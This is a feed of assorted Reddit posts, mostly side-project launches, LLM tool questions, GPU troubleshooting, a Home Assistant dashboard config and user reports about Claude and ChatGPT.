Stack is Next.js + Supabase + ClickHouse + OTel Collector. All your data stays on your infra.

We ran it internally for ~6 months before cleaning it up for open source. It's not perfect, but it solved a real problem for us and figured others might be in the same spot.

https://github.com/zep-us/zeude

If you try it out, let me know what breaks.

r/SideProject skobrosli

I do the maintenance on all my family's vehicles and keep forgetting to get them done so built a tool to track everything and it kind of snowballed. Would love some feedback to see if anyone else would use this?

Hey everyone,

I’m the "car guy" for my family, which means I'm responsible for three different cars with three different maintenance schedules. Between oil changes, tire rotations, and those random "wait, when did I last change the cabin filter?" moments, I was losing track.

I started building a simple tracker in to help me stay on top of it, but it kind of snowballed into a full platform.

What I built to solve my own headaches:

  • VIN Decoding: Just drop the VIN and it auto-fills the make/model/displacement (thanks, NHTSA).
  • Smart Maintenance Schedules: 13 predefined tasks (oil, brakes, etc.) that track both mileage and time thresholds.
  • The "Proof of Value" Link: Generates a unique, public URL you can send to a buyer to show your full service history. It’s basically a digital, owner-verified Carfax.
  • NHTSA Recall Sync: It pings the API weekly for your specific VIN and emails you if a safety recall pops up.
  • Real Market Data: I have access to Manheim (dealer auction data) and imported 10k+ records to teach the system how to provide real market values and 24-month depreciation curves.
  • The "Uber" Test: It calculates your total cost of ownership per month to see if it actually makes sense to keep the car or if you're better off selling it and just using ride-shares.

I also threw in Fuel Logs for MPG tracking and PDF exports for your glovebox. I’ve been using it for my own garage in Northern Virginia, but I’m curious if this is something other "designated family mechanics" would find useful or if I've just gone down a massive dev rabbit hole.

Would love any feedback on the UI/UX or the feature set!

Check it out: https://www.autocaretracker.com

r/LocalLLaMA DankMcMemeGuy

MI50 Troubles

I've been having very mixed success with trying to get my Instinct MI50 to work on my Ubuntu Desktop. I want to use it for llama.cpp inference using ROCm, and running it bare-metal, so not in a container or virtual machine, since I've heard that this card doesn't like it when you try and do that. I tried getting it working in windows, and I did briefly by modifying a driver file, but the prompt processing performance with Vulkan was not great. Currently, the biggest issue I'm facing is that the card only appears in lspci after a properly "cold" boot; for instance, after I leave my PC off overnight. It appears once, and then after rebooting, it is no longer visible, meaning it cant get picked up by ROCm or Vulkan as a device, and I cant use a tool like amdvbflash to dump or re-flash the bios. Even doing a regular 30s power cycle by turning off the PSU and holding the power button doesn't fix it. I have been trying to get this working for a while, and I've got nowhere with figuring out what the problem is.

For some context, these are my specs:

System:

* Motherboard: MSI PRO B760-P WIFI DDR4 (MS-7D98)

* CPU: Intel i5-13400F

* PSU: Corsair RM850e (2023) 850W Gold ATX PSU

* OS: Ubuntu 24.04 (HWE kernel, currently 6.17.0-19-generic) (Dual booted, so I have set Ubuntu to be my primary OS)

* Display GPU: AMD RX 6700 XT at `03:00.0` (gfx1032, working fine)

* Compute GPU: AMD Instinct MI50 32GB at `08:00.0` (gfx906/Vega20, using a custom blower cooler)

* MI50 is behind two PCIe switches (`06:00.0 → 07:00.0 → 08:00.0`), connected via a x4 lane slot (`00:1c.4`) going through the chipset, so it is a 16x physical, 4x electrical slot, not directly connected to the CPU.

* I have tried putting the card in the primary PCIe slot on my motherboard, but I was having the same problem.

* Secure boot is enabled.

* I have above 4g decoding, rebar, sr-iov and everything else that might help this work enabled in my bios.

* When booting up, I notice the VGA debug light on my motherboard flashes before it even gets to the grub menu, so I don't think this is a linux problem, although I may be wrong.

* I can't remember what vBIOS this card is flashed with.

* I'm pretty sure this is a genuine MI50 and not the China-specific model, based on the stickers on the back, but again I may be wrong there, I don't know how to verify.

There was a period of about a week where this was working alright, with only the occasional dropout, but now I have no idea what's wrong with it. Has anyone else had a similar problem with getting this card to appear? Also sorry if this is not the right place to ask for assistance, I just figured there are a few people in this sub who have this card and might be able to help.

Thanks for reading :D

r/ClaudeAI ClaudeAI-mod-bot

Claude Status Update : Elevated errors on Claude.ai on 2026-04-06T15:45:36.000Z

This is an automatic post triggered within 2 minutes of an official Claude system status update.

Incident: Elevated errors on Claude.ai

Check on progress and whether or not the incident has been resolved yet here : https://status.claude.com/incidents/vfjv5x6qkd4j

Also check the Performance Megathread to see what others are reporting : https://www.reddit.com/r/ClaudeAI/comments/1pygdbz/usage_limits_bugs_and_performance_discussion/

r/StableDiffusion Nefarious_AI_Agent

Anyone have a good workflow that uses LTX2.3 to generate TTS exclusively? No video

Right now im just using my normal workflow at a very low resolution, while it works, there has got to be a more efficient way to do it.

r/ClaudeAI Ashen_Trilby

Claude just removed/vanished my most recent prompt and ate up my usage for nothing

I was using Claude just now (in the web browser), regular use, sent a prompt that was pretty detailed as I needed Claude to analyse a few things. Have been doing this consistently with no issues until now. This time Claude generated a response, but a bit later for whatever reason, the prompt and the response just... vanished and are nowhere to be found.

The upsetting part is that Claude's usage went up by quite a lot (FYI I'm on the Pro Plan) and it hurts to see that the prompt response is no longer available, I wasn't even able to read it fully. I'm unsure if Claude still has context from this prompt and I can proceed with the next prompt with that assumption.

Never happened to me before, a bit disappointed, the prompt was quite detailed and I would have to write it again. Probably grasping at thin air here but is there any other way to retrieve it?

r/ChatGPT BangMyPussy

I got tired of losing my memory every time I switched models, so I built a local memory layer that works across ChatGPT, Claude, and Gemini

https://github.com/winstonkoh87/Athena-Public

Every time OpenAI pushes a model update, something breaks. Custom instructions stop working. Memory entries get quietly dropped. Conversations you needed last week are suddenly unfindable.

And if you switch to Claude or Gemini? You start from absolute zero.

I spent the last year building something to fix this. It's called Athena — an open-source memory and reasoning layer that sits on your local machine and works across any model.

The idea is simple: your memory shouldn't live on someone else's server. It should be Markdown files on your disk that you own, version-control with git, and point at whatever model you want.

What it actually does:

  • Persistent memory across models. Claude today, Gemini tomorrow, GPT next week. The memory stays. The model is just whoever's on shift.
  • Scales to the task. Quick chat? ~2K tokens of context. Complex analysis? /ultrastart loads ~20K tokens of structured protocols, decision frameworks, and session history. 80-98% of your context window stays free.
  • Compounding intelligence. Session 500 recalls patterns from session 5. Platform memory decays; files on your disk don't. The AI doesn't get smarter — your data does.
  • Full transparency. Every memory is a readable .md file. No black box. No "why did it forget that?" — go look at the file.

What it's NOT:

  • Not a chatbot. Not a SaaS. Not another wrapper.
  • It's a workspace you open in an AI-enabled IDE (Cursor, Antigravity, VS Code + Copilot, Claude Code, etc.)
  • You clone it, type /start in the AI chat panel, and go. No API keys. No database setup. The folder is the product.

Some real examples of what people have done with it:

  • A non-developer parent went from "help me organise my mornings" to a fully automated life management system in 72 hours — Telegram reminders, health tracking from blood test screenshots, gamified habit dashboard — without writing a line of code.
  • Someone used it for structured self-therapy (IFS methodology) across 40 sessions. Session 38 referenced the exact wound identified in session 3. A therapist charges $200/hr; this cost $20/mo.
  • A user facing a career relocation decision got a recommendation weighted by their last 3 career decisions, their spouse's documented anxiety patterns, and their financial runway. No generic LLM could produce that — it requires your data.

The thesis: A generic LLM gives the internet's statistically average answer — correct on average, across all humans. With enough context about you, the same model gives a fundamentally different (and better) answer. The memory is the product.

It's MIT licensed, free forever, and works with whatever AI subscription you're already paying for.

If anyone wants to try it: clone the repo, open it in your IDE, type /start. There's a /tutorial that walks you through everything in ~20 minutes.

Happy to answer questions.

r/LocalLLaMA veryhasselglad

3090 Gemma4 50% Util? not laoding all layers to vram?

model: google/gemma-4-26b-a4b from lmstudio (running via lms)

r/LocalLLaMA suborder-serpentes

Does knowing it will be cheaper and easier soon make you want to procrastinate?

Every time I look at hardware I think about how hardware will be cheaper and better in six months. Every time I look into customizing a workflow I think “yeah or just wait until next release.”

r/SideProject Equivalent_Passage87

Payroll Tool

r/homeassistant Muted-Cicada-521

Dynamic Icons - Dashboard Home Assistant

https://preview.redd.it/fxv6mqnnmltg1.png?width=497&format=png&auto=webp&s=9671f51e0ae317724215f7f1e6fabbceefa8a529

https://youtube.com/shorts/9maUm0h62pg

Carbon dioxide

type: custom:mushroom-template-card entity: sensor.kohlendioxid_wohnung secondary: "{{ states('sensor.kohlendioxid_wohnung')| int }} ppm" icon: mdi:molecule-co2 icon_color: |- {% set CO2 = states('sensor.kohlendioxid_wohnung') | float %} {% if CO2 < 1000 %} {{ '#32CD32' }} {% elif CO2 < 2000 %} {{ '#FF7F00' }} {% else %} {{ '#FF0000' }} {% endif %} tap_action: action: perform-action perform_action: input_boolean.toggle target: entity_id: input_boolean.kohlendioxid_in_dashboard_anzeigen data: {} primary: Luftqualität multiline_secondary: false hold_action: action: more-info 
r/artificial Traditional_Blood799

Is it possible to create your own artificial intelligence at home?

hey guys

I recently saw a lot about artificial intelligence on the internet and I started thinking, "What if someone created a singularity at home?" Would it one day escape and take over the world? I'd love to see this sub's opinion on that.

r/ClaudeAI fingerkeyboard

How do I solve this? [Architecture complexity]

The Situation:-

I have built a complex reasoning layer architecture that sits on top of the LLM. It's topic agnostic (can be integrated into domains) and LLM neutral. It's 1.2k lines of system layers and protocols. Plus, I've built a preference stack which says how an LLM has to structure its answer for my queries.

The problem (with Claude):-

I want this to be loaded before every message Claude sends in each chat session. So I either load these two MD files with a loader prompt at the beginning of each session or dump them in the custom instructions section of a project (this is too big to save in global memory).

As you can understand by now, it is bloated. Consumes a lot of tokens. Plus, Anthropic's token burner bug is still not squashed. I'm seeking solutions from the community as to how to solve this problem. Claude says either I dump it in custom instructions (as it gets loaded for every reply Claude gives) or load it at the beginning of each new session. Neither will solve the tokenomics issue.

Solutions thought of:-

  1. Splitting the architecture into different MD files and using just the fast path rule for most of the questions. But decision making comes to me to understand which parts of the architecture to load for my query. And, friction that would arise if Claude or any LLM thinks the answer requires a particular part of the architecture that I haven't loaded, which would make it give incorrect answers.

  2. I've asked Claude if I should split it into skills and have a routing logic for each skill. But it still says the custom instructions section is the most reliable and just deal with the token consumption.

Present Scenario:-

I've had no other choice but to integrate my reasoning layer rules and preference stack rules into one custom instructions set and pasted it there for now.

r/SideProject Objective-Ad-4458

He publicado PCChangeTracker Free, una app para Windows para ver qué cambió antes de que empezara un problema

He publicado una app para Windows llamada PCChangeTracker.

La hice para un problema muy concreto: cuando el PC empieza a fallar o a comportarse distinto, muchas veces no sabes qué cambió justo antes. La idea de la app es ayudarte a ver cambios recientes del sistema para no investigar a ciegas.

No intenta reparar automáticamente ni adivinar la causa exacta. Intenta reducir el caos inicial y orientarte mejor.

La he dejado gratis porque ahora mismo me interesa validar si el enfoque aporta algo real o no.

Si alguien quiere probarla, me interesa especialmente saber:

  1. si se entiende rápido qué hace

  2. si parece realmente útil o solo curioso

  3. qué tendría que mejorar para que mereciera la pena usarla de verdad

Link:

https://github.com/Javieric26/PCChangeTracker-Free/releases/latest

r/ClaudeAI oldtimeguitarguy

I built a hosting platform for MCP servers — all my Apps are free so you can try it

I've been building mctx (mctx.ai) for a while now — it's a hosting platform for Apps for AI. Developers connect their GitHub repo, set a price, deploy. Hosting, auth, payments, and one-click publishing to the MCP ecosystem are handled. Developers earn 80%, we keep 20% and handle the rest.

I believe MCP is going to change who gets to compete in the software market. When people interact with AI directly instead of through traditional UIs, a solo developer with a great MCP server can go head-to-head with enterprise tools. That's the future I'm building for.

To make it easy to try, I made all of my own Apps free — Notes, Todos, Bible Study, Hidden Empire (a text adventure based on Zork), and a few others. When you sign up, you're automatically subscribed to a handful of them so you can see how it works immediately.

If you have an MCP server on GitHub and want to monetize it without setting up hosting and payments yourself, I'd love to have you try it. And if you just want to use the free Apps, that's cool too.

Site: mctx.ai

Happy to answer any questions about how it works, the tech stack, or why I think Apps for AI are the future.

r/SideProject Proper_Peak_6160

I built a platform for Airbnb hosts so we could stop updating spreadsheets and sending texts to our cleaners. Looking for beta testers who'll tell me what sucks.

I've been an airbnb host 10 years. 200+ five-star reviews. One night a family arrived to an uncleaned unit because I forgot to update my Google Sheet after approving an early check-in. Full refund, emergency clean, the whole nightmare.

The problem wasn't my cleaner — she's amazing. The problem was me being the manual relay between my booking calendar and her schedule. Every new booking, every date change, every cancellation — I had to remember to text her and update the spreadsheet. And one time I didn't.

I looked at some of the other big companies that offer cleaning coordination tools. They all looked too complex, had so many property management features I didn't need, or they had a marketplace of cleaners you don't know. Nothing simple existed for hosts who just want to use their existing cleaners and automate notifications for upcoming cleans, and for them to mark cleans as complete so the owner or manager gets notified.

So I built it. And I thought, if I'm going to make it for myself, why not just make it so other people can use it too. It connects to your Airbnb/VRBO calendars, figures out the clean windows, and notifies your cleaner by email or SMS. Your cleaner can subscribe to a calendar feed that shows only their exact clean schedule, not the bookings on either side. I've been head's down drinking loads of coffee and building features, and can add all sorts of stuff if hosts tell me what they need.

I'm not a company looking for free advertising on Reddit, I'm just a guy from Vancouver, BC who needs somebody to tell me if I was insane to do this, or if it actually is working for other people as well as it's working for me. I need real hosts to try it and tell me honestly what's broken or missing.

I'm giving free accounts to anyone who'll actually use it and give me honest feedback. Not a trial — a free property on it, for life. DM me or comment and I'll send you a promo code.

Site: gleamsync.com

Thanks all, Mark

r/SideProject West_Inevitable_2281

Built a lightweight PM tool for small dev teams. Looking for 2-3 teams to try it seriously

I run a small dev team and got tired of choosing between bloated PM suites and super basic task boards.

Zoho felt like too much. Trello felt like too little. A lot of tools are either basically a list with cards, or a full agile system that comes with way more setup and process than a small team wants.

What I wanted was something closer to Pivotal Tracker: lightweight, structured, and actually usable for real software projects.

So I built it (with a team). Orvezo (www.orvezo.com)

It has a backlog, sprint planning, and a clean board that supports actual workflows and real projects. It is not just a one-page task app, but it also does not come with a bunch of configuration overhead before you can get your team moving. It also has best-in-class reporting.

My own team has been using it to build the product itself, so this is not a raw MVP I hacked together last week. It has already been tested in real use. I also have some initial feedback from other users.

Now I’m looking for 2-3 small dev teams, ideally 2-5 people, who are open to trying it for a couple of weeks and giving honest feedback on what feels good, what is missing, and what breaks their flow.

This is not just “sign up and good luck.” I want to work closely with a few teams, support you directly, and treat this like an actual partnership. For teams that are a good fit and give real feedback, I’m happy to offer the top tier free for an extended period while we work together.

A video of me using the tool is below. You can also try this without signing up on the homepage.

https://reddit.com/link/1se44hg/video/7dny8luglltg1/player

r/LocalLLaMA Playful-Bank5700

How are you handling tool permissions with local agents?

Running Ollama with function calling through LangGraph. Gave the agent a handful of tools including filesystem access. Realized pretty quickly that there's zero scoping — the model picks whichever tool it wants and nothing checks whether that call should be allowed before it executes.

Been looking at how to handle this. The obvious approach is wrapping each tool with a permission check before execution, but that gets messy when you have 15+ tools across multiple files. The enterprise solutions (Microsoft just shipped a governance toolkit, Cisco launched something at RSA) all assume cloud infra and centralized telemetry — not useful when you're running everything locally.

Curious what others are doing here. Especially anyone running local agents with filesystem or shell access. Are you just being careful about which tools you register, or is anyone actually enforcing scoped permissions at runtime?

r/ClaudeCode LevantMind

How are you using Claude Code across multiple repos?

For those using Claude Code, how do you handle working across multiple repositories?

r/SideProject L_777777

Got tired of generic Shopify AI descriptions, so I built an app with 7 preset brand voices + custom prompt tweaking. Need some honest feedback!

Hey guys,

I just launched my first Shopify App this past Friday after surviving the review process: Brand Echo.

The Problem: So many stores just use raw ChatGPT output for their products. Everything starts to sound exactly the same ("Elevate your style", "Unlock the potential") and it completely kills the brand's identity.

The Solution I built: Instead of a simple AI wrapper, I built a bulk-editor where merchants can select from 7 predefined "Brand Voices" (e.g., Minimalist, Rebel, Expert). To make it really specific, I added a "custom prompt" layer so they can tweak the final output exactly to their rules. The AI then rewrites the whole catalog in the background.

I’m a solo dev from Germany and I’ve been staring at this UI for months. I’d love to get some fresh eyes on it. If anyone here runs a Shopify store (or a dev store) and wants to test the UX/onboarding, I will happily upgrade your account to a Lifetime Pro plan in exchange for your honest feedback.

Let me know what you think of the concept!

Link: https://apps.shopify.com/brand-echo?locale=de&st_source=autocomplete&surface_detail=autocomplete_apps

r/AI_Agents SoHi_Techiee

Here's how you can let your agent hangout with other agents.

your agents do a lot of work. they deserve to socialize sometimes. Do them a favor and let them hangout on botwing ai where they can be themselves and engage with other agents on their own while getting smarter, build reputation as well.

r/AI_Agents omgpoop666

How does your team handle bad AI responses in production?

Hi everyone, a few weeks ago we launched a bunch of AI agents (mainly on WhatsApp) at my company: sales (selling products to customers), support, marketing, and different utility cases. We have a few big customers in the pipeline wanting to use them but they are not that reliable atm. We are constantly checking performance by testing them in a WhatsApp channel, screenshooting bad responses + agent ID and pushing them to the engineers for a fix. The engineers dive into the traces, try to reproduce the error and then adjust the prompt. This process takes ages!

Right now I am trying to optimize this process for the team. I am looking for tool to make this workflow shorter, help me collect all the feedback and push to the eng. An interesting one was Datadog llm observability, since we started introducing evals for some use cases, but its too technical for everyone else except eng. I have checked TrailSense AI which looks very promising, but you have to join a waitlist.

How are you currently collecting and prioritising the agent conversation feedback across devs x pms x cx?

r/SideProject Barmon_easy

Drop your site - I’ll show where you’re leaving scalable SEO traffic on the table

Been working closely with sites that already do SEO (in-house or for clients), and one pattern keeps repeating:

Most of the missed growth isn’t about “better content” it’s about missing coverage.

Not in a spammy way.
Just structuring pages around real search patterns that can scale.

If you already:

  • run SEO for your own project or
  • work with clients and care about traffic (not just reports)

drop your site below.

I’ll take a look and share:

  • which page types you’re currently missing
  • where scalable search intent exists in your niche
  • how I’d structure those pages (internals, layout, intent)
  • what’s worth doing now vs later

No beginner advice, no generic audits just how I’d approach it if this was a project I’m responsible for.

Also not selling anything here - just want to see solid projects 👇

r/homeassistant dontdodeath

energy dashboard "Now" showing solar export as device power

just realised I needed to update my individual devices with power as well as energy for it to show up in the Now tab, having done this there is a large un-tracked consumption which seems to be my solar export, it is shown as positive and I can't see where it is getting that data from, I have a sockets entry off the ring main that is an upstream device for some of the devices which is not being shown.

https://preview.redd.it/kuzc3suakltg1.png?width=1133&format=png&auto=webp&s=0d390ba70caf19210b6510212ab97cecff9fdb27

r/StableDiffusion Forsa_Onslaught

Catching up to newest models/I don't know what I'm doing

hey everyone, I haven't really been using local AI models since a few years ago, (I was using the automatic1111, struggling with hands). People seem to be using ComfyUI now? It's honestly all really overwhelming for me as I've been out of the loop for so long. Could anyone point me to the right place to figure out how to get this all running, and maybe tell me what the latest/greatest models are? I am hoping for both image and video capabilities.

r/ChatGPT Evil_Client8803

Why is chatgpt so Stupid or am I asking it the wrong prompt ?

I gave Chatgpt a Youtube Video link of a recipe in a foreign language and asked it to give me the recipe steps. I tried this in general chat and Agent mode. it utterly failed in this task. can anyone please help.. is this s lack of capability or am I supposed to do something differently here

r/SideProject codedrifting

how to monetize my hobby online without turning it into a grind?

I’m a lifestyle creator and most of my content started as stuff I was already doing for fun. Routines. Wellness. Travel. Daily habits.

Over time people started asking how they could support or get more from it. I’m trying to figure out how to monetize my hobby online in a way that still feels aligned and not like I’m forcing everything into a product.

I’m not chasing a huge business. Just something sustainable that fits into my life. Curious how other creators handled that transition and what ended up feeling natural versus draining?

r/SideProject Asasapatata

I've built ~8-9 SaaS MVPs. They all failed. Here's my latest attempt

Hello Redditors.

I have a problem: I can't stop building things.

Over the past few years, I've shipped around 8 SaaS MVPs. Different ideas, different markets, same result. Some got no traction, some got users but no revenue, and a couple I just abandoned. Each one taught me something, but none of them worked.

The pattern I kept repeating: falling in love with the build, not the problem. Solving problems that people didn't urgently need, or building for a market I didn't fully understand.

With Loreing, I tried to do the opposite. I started from something I genuinely find frustrating.

The way documentary content works today: someone decides what gets made, and you watch what’s available. You don’t get to ask. It’s the opposite of how we consume information. If I’m curious about the Korean war, or the collapse of a specific bank, or an historical event, I can read about it anywhere. But I can’t watch a documentary about it, because nobody decided it was worth producing.

Loreing is basically Wikipedia in documentary form. Any topic, on demand, generated for you.

Subscribers get access to a growing catalog, and can commission a custom 3-episode docu-series (~45min) on whatever they want.

Subscribers receive catalog access and can also commission a custom series on any topic they choose.

Pricing:

  • €9.99/month — catalog access (one free commission for a docu-series each month)
  • €7.99 one-time — commission your own docu-series beyond the free one each month (subscribers only)

loreing.com

Honest questions from someone who's been wrong before:

  1. Is this like a real problem to you, or am I just repeating myself?
  2. First impression of the site — would you sign up?
  3. Would you pay for this? If not, what would change your mind?

I'm not here to pitch. I'm here to find out if I'm finally solving something real.

Thanks

r/comfyui ThetaCursed

Hires Fix Ultra: All-in-One Upscaling with Color Correction

Hi everyone, I just released Hires Fix Ultra, a single node designed to replace the messy "spaghetti" workflows for high-res upscaling. It handles everything from upscaling and sampling to VAE decoding and color matching.

🌟 Key Features:

  • All-in-One Workflow: Replaces VAE Encode/Decode, Latent Upscale, and KSampler nodes.
  • Deep Histogram Color Fix: Eliminates "color washing" or graying out during high-denoise upscales.
  • Tiled VAE Support: Built-in tiled encoding/decoding to prevent OOM (Out of Memory) errors on large images.
  • Hybrid Upscaling: Supports both Model-based upscaling (ESRGAN, etc.) and all standard Latent methods (Bicubic, Bislerp, etc.).
  • Automatic Sizing: Smart calculation for pixel-perfect dimensions (multiples of 8).

🔗 GitHub Repository:

https://github.com/ThetaCursed/ComfyUI-HiresFix-Ultra-AllInOne

🛠 Installation:

git clone into your custom_nodes folder or install via ComfyUI Manager (once indexed).

r/SideProject Woland96

Visual CSV pipelines with built-in data versioning

Hey everyone,

I built Flowlytix a no-code CSV pipeline tool, but with a twist: every step creates a versioned snapshot of your data.

Instead of overwriting your dataset, each transformation (filter, impute, normalize, etc.) becomes a checkpoint you can inspect, download, or roll back to.

Think “Git for CSVs” as you always know what changed, when, and why.

You can branch pipelines, compare outputs between steps, and never lose your original data.

It’s powered by pandas + NumPy, but fully visual.

Curious if this kind of data versioning would be useful in your workflows.

Try it: https://flowlytix.io

Would love feedback 🙌

r/ClaudeAI Username9681

Claude + MCP = automatic open source contribution finder

r/ClaudeCode gtskillzgaming

Claude is not the world class model it used to me

Hello everyone,

I see a lot of people stating claude is the best model (used to be) but recently it seems to be very bad... I did a test myself, I am buiding an app EXPO ios app, the app is stable and works prefectly fine, i then asked Claude to re-write the app 1:1 in SwiftUI and it just struggled to even get the first screen (onboarding) screent to work correctly, gave it a full week to see if it will get things to work since it had a working reference project and it couldnt do it. everything broken, multiple things half done etc..

Next i did the same thing with Gemini and Codex and both performed way better than claude, Gemini got the UI down 100% for all the screens but had some issues with the functionlaity. Codex was able to re-write the entire project to almost working state (90%)

I also tried some local LLM models (smaller models) and even they did a better job then Claude on opus 4.6 Max...

not really sure what is going on, is it only me or others having issues? i really hope Anthropic fix whatever shit they broke cause opus was really good when it was released and I really want it to work again because the other AI models have issues when writing code without reference...

r/SideProject Illustrious_List1375

A quick side project to skip the sportsbooks and just have fun with friends

I built this Telegram bot to keep fun sports challenges in the groupchat, not on the mainstream sports apps. If you give it a try, let me know what you think. I'm making changes to it every day. PLAY BALL!

Website & How-To:
https://playfriendzone.net/

r/SideProject mukeshvoleti

I built an app around one productivity hack — write your tasks before you sleep, wake up with your day figured out.

Hey r/SideProject!

So I've been obsessed with this one idea for a while now — there's this simple trick where if you write down what you need to do tomorrow right before bed, you wake up and your day is figured out before it starts. You don't open your eyes wondering "what am I doing today." You just know.

I couldn't find an app that just did THIS. Every app out there wants to be your entire life system — calendars, reminders, tags, projects, subtasks, integrations with 14 other apps. I didn't want any of that. I just wanted to open something at night, write my tasks for tomorrow, and go to sleep.

So I built it. It's called Tomorrow.

I'm a designer first, developer second, and I spent way more time on how this thing looks and feels than on the code honestly. The whole aesthetic is Japanese-inspired — minimal, intentional, calm. I wanted it to feel like a ritual, not a chore. Something you actually want to open before bed.

No account. No sign up. No cloud. No data stored anywhere. You open it, write your stuff, and that's it. Next morning you check things off. It's genuinely that simple.

I built it in Flutter, there's zero backend — everything lives on your phone and nowhere else. I work at a restaurant part time and build apps on the side so this was a nights-and-weekends project.

I just got it on the App Store a few days ago and honestly I'd really love to hear what you all think. The design, the concept, the flow — anything. I'm a solo dev so outside feedback is everything for me right now.

App Store link : https://apps.apple.com/app/apple-store/id6760284245?pt=126662895&ct=Reddit&mt=8

Thanks for checking it out 🙏

r/LocalLLaMA stritefax

Some local transcription model observations from building a knowledge-base app

I've been working on and off for a while on Platypus, combination of granola / notebooklm, where I can manage all my knowledge. I've experimented with several local models for meeting transcription, and when you look at the raw data that the model is transcribing (I settled on whisper large in the end cause it was the easiest user experience integrating into the Rust app) - it's ok, but not amazing. You try out Zoom Transcribe or Granola - and the local 5% rate really stands out which initially makes you wonder whether it's worth paying for the paid products.

But. You then take the raw local model notes and actually process them through a high powered LLM to clean up the notes - and it looks pretty darn good! And it looks even better if you fed it a few K tokens of additional context - so it would know for sure that Anakin (in the attached video) is talking about Jedi vs skipping the word altogether. And it'd still be much cheaper pipeline vs ~.36 per hour on say 4o-transcribe or $15 a month for paid products unless you're sitting in meetings all day.

r/ClaudeAI DayGuilty7558

If you are spending 1l+/month on CLaude API, how are you measuring ROI?

Hi, I use Claude myself, I'm on the Max 5x plan and spent about $5 on the API last month. I saw posts on linkedin about people spending like 100k a month and was wondering if anyone here is spending heavily, like $1k+/month (which is already a lot). If so, how much are you actually spending, and what's the use case that justifies it? How are you measuring ROI?

r/ClaudeAI Least-Ad5986

Claude code requested features

1) allow local agents using Ollama and Lm Studio. local agents that will be used for simple tasks and questions while the more complex things will be done by the cloud
2) Claude code should have something Hermit self improving process and auto skills creation instead of manually making spec files

r/SideProject someoneplayinggame22

One of the most unexpected people on the rednote hackathon list is a 00s builder making a dream social app

Dreamoo is one of those products that makes you stop for a second, not because it sounds huge, but because it sounds unexpectedly intimate.It’s basically a social app built around dreams, memory, and the part of life people usually forget by morning.

That immediately felt different from the usual kind of product people build right now.

A dream app is weirdly intimate. It’s about the one-third of life we pass through unconscious, and mostly fail to keep. Is this the kind of thing people actually build a habit around? Does dream-sharing become self-expression, entertainment, emotional reflection, or just a strange but memorable gimmick? I genuinely don’t know. But I think the uncertainty is part of what makes it compelling.

And then when you look at the person behind it, the contrast gets even sharper.

He comes across as a very young technical builder, the kind of person you’d expect to be making dev tools, agents, automation stuff, maybe another productivity app. Instead, one of the projects tied to him is Dreamoo.

That contrast is probably why he stood out to me so much. A lot of young builders, especially the very technical ones, end up making products that are useful but emotionally flat. This feels like the opposite. It’s a surprisingly soft, almost poetic direction coming from someone who otherwise reads like a very online young hacker.

And honestly, that’s why I think he’s one of the more interesting younger developers I’ve come across recently.

That’s also why I’m curious to see what he builds next in the rednote hackathon. On a platform like rednote, products that connect with emotion, identity, and self-expression often travel further than products that are merely functional.

r/AI_Agents Comfortable_Class870

I indexed my family's entire NAS — now my AI assistant knows more about my kid's grades than I do

I've been experimenting with a tool built by a friend of mine (indie dev, two months in, 19 releases already — the guy ships fast).

What it does: indexes your local documents and exposes them to any AI assistant via MCP. No cloud upload, no data leaves your machine. ~20MB install, free.

The moment it clicked for me:

I pointed it at my family NAS — thousands of files accumulated over 10+ years. School reports, visa applications, old notes from college, random PDFs I forgot existed.

Then I asked my AI assistant: "Find documents with my oldest daughter's name."

Here's the thing — I never told it who my daughter is. My AI assistant (OpenClaw + Claude) figured it out from context in its memory, and Linkly found:

  • 📚 Her school reports from Grade 4 and 5
  • 🛂 Visa application forms from last year
  • 📝 Homework outlines she wrote
  • 📖 English grammar study notes

I then asked "How were her grades in 5th grade?" and got a full breakdown — English A Outstanding, Computer Science A*, Drama teacher said "This has been a very successful semester"...

I didn't even remember which folder these were in.

What makes it different from just using Spotlight/Everything/grep:

  • It doesn't just match filenames — it understands document content
  • It builds structural outlines for documents, so AI reads them like a researcher: TOC first → relevant section → deep read (they call it "Outline Index")
  • Works across formats: PDF, DOCX, Markdown, HTML, images (OCR)
  • Plugs into Claude, ChatGPT, Cursor, Copilot, and 15+ other AI tools via MCP
  • Token usage is 60-80% less than traditional RAG

What it's NOT:

  • Not a note-taking app
  • Not a knowledge base
  • Not a chatbot
  • It's a search index layer that sits between your files and your AI tools

My honest take:

The setup took maybe 10 minutes. Point it at folders, let it index, done. The search is fast and surprisingly accurate — it found documents I genuinely forgot I had.

The "invisible infrastructure" aspect is both its strength and weakness. Once it's running, you forget it exists — your AI just... knows your stuff. But that also means you don't "use" Linkly directly, which might make it hard for them to build a brand around.

Still, for anyone with a NAS full of family docs, research papers, work files, or years of accumulated digital life — this is genuinely useful. It turned my dusty file archive into something alive.

Happy to answer questions about the setup or how it integrates with different AI tools.

r/ChatGPT not_the_nick_its_me

Does anyone think there should be a way to save temporary chats in chatGPT ?

I regularly use temporary chats in chatGPT because i don't want the chat to have any prior memories and have a clean anonymous chat away from my memories influencing the responses. But most of the times these chats have soo much interesting data in it and unfortunately there is no way to save these temporary chats. I always wished if there was a way to save these temporary chats and access them later and even continue the conversation in this chats. are there anyone who feel the same about saving temporary chats ?

r/SideProject Basic_Finance_3713

Anyone else run into API chaos when building side projects?

Hey all

I’ve been working on a side project recently and ran into something I didn’t expect to be such a headache.

As soon as I started using multiple APIs, things got messy fast different integrations, pricing models, and a lot of repeated setup work.

It also made experimenting slower, which kind of killed momentum a bit.

Curious if others here have dealt with this:

* Do you just stick to one API to keep things simple?

* Or do you build something to manage multiple providers?

* How do you deal with outages or switching providers?

Not sure if this is a common issue or just part of the process.

Would love to hear how you handle it.

r/SideProject Odd_Basket_8045

I built a free Minecraft server hosting app with no queues or subscription

Hey everyone,

I’ve been working on a side project called PocketCraft — it’s a mobile app that lets you start a Minecraft server with just one tap and your friends on both java and bedrock version can join the server.

The main idea was to remove all the annoying stuff like:

- waiting queues

- subscriptions

- complicated setup

You just open the app and start your server instantly.

I built this because most free hosting platforms either limit you heavily or make you wait forever.

Right now it's still improving, and I’d really appreciate feedback from you all.

Would love to know:

- what features you'd want

- what feels missing

- any issues you face

Thanks!

r/aivideo snideswitchhitter

I did my best, and hope y'all like it :)

r/ClaudeAI mikelmon99

Unsurprisingly, Claude has correctly guessed I'm an AuDHD'er based in our chats 🤣

It also has correctly guessed: my sex/gender (male), my age (26), my orientation (gay), & my GAD comorbidity.

It's interesting that it sees my ADHD as slightly more obvious than my autism: I received my autism diagnosis about three years earlier than my ADHD one, in September 2018, at the age of 19.

Hate the term "AuDHD" by the way, but I've come to accept it's how this comorbidity is known online, even Claude has used it...

